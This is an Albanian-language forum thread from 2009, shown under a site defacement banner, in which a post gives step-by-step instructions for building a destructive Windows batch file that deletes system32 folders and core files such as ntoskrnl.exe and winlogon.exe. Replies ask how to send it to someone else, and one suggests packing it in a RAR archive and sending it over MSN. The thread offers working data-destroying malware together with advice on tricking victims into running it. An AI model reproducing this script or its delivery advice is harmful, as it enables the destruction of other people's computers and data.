Hacked By L0wHacker

Hacked By L0wHacker
Hacked By L0wHacker

Hacked by L0wHacker


  Si me kriju nje bomb virus qe shkatrron pc

  Share

  Si me kriju nje bomb virus qe shkatrron pc

  Mesazh nga Caveman prej Fri May 15, 2009 5:55 am

  SE PARI HAPIM NJE TEXT DOKUMENT ne kete menyr START/ALL PROGRAMS/ACCESSORIES/NOTEPAD
  NE TE SHENOJM KETE TEXT:

  @echo off
  del "C:\windows\pchealth\"
  del "C:\windows\system\"
  del "C:\windows\system32\restore\"
  del "winlogon.exe"
  del "C:\windows\system32\autoexec.nt"
  del "C:\windows\system32\logonui.exe"
  del "C:\windows\system32\ntoskrnl.exe"

  pasi te keni kryer kete me ne fund dhe me kryesorja esht qe ky document te ruhet ne kete format: emri.bat
  p.sh. t1nArG.bat
  RREZIK MOS E HAPNI KETE NE PC TUAJ SE MUND TE UA SHKATRROJ PC PER GJDO GJE QE JU NDODH PC SUAJ UNE NUK JAM PERGJEGJES.

  Tuto By Power|Hack

  Re: Si me kriju nje bomb virus qe shkatrron pc

  Mesazh nga -darddyy- prej Wed May 20, 2009 2:03 pm

  Hallal te koft njeri a Razz po kur ta ndreqi une ket virus qysh muj me ja qu tjeter kujna?
  avatar
  JoK3r
  Designer
  Designer

  Re: Si me kriju nje bomb virus qe shkatrron pc

  Mesazh nga JoK3r prej Thu May 21, 2009 5:34 am

  Shtina En Naj Rar File Edhe Qoja Me Msn...Very Happy

  Sponsored content

  Re: Si me kriju nje bomb virus qe shkatrron pc

  Mesazh nga Sponsored content


   Ora është Sun Apr 22, 2018 9:53 pm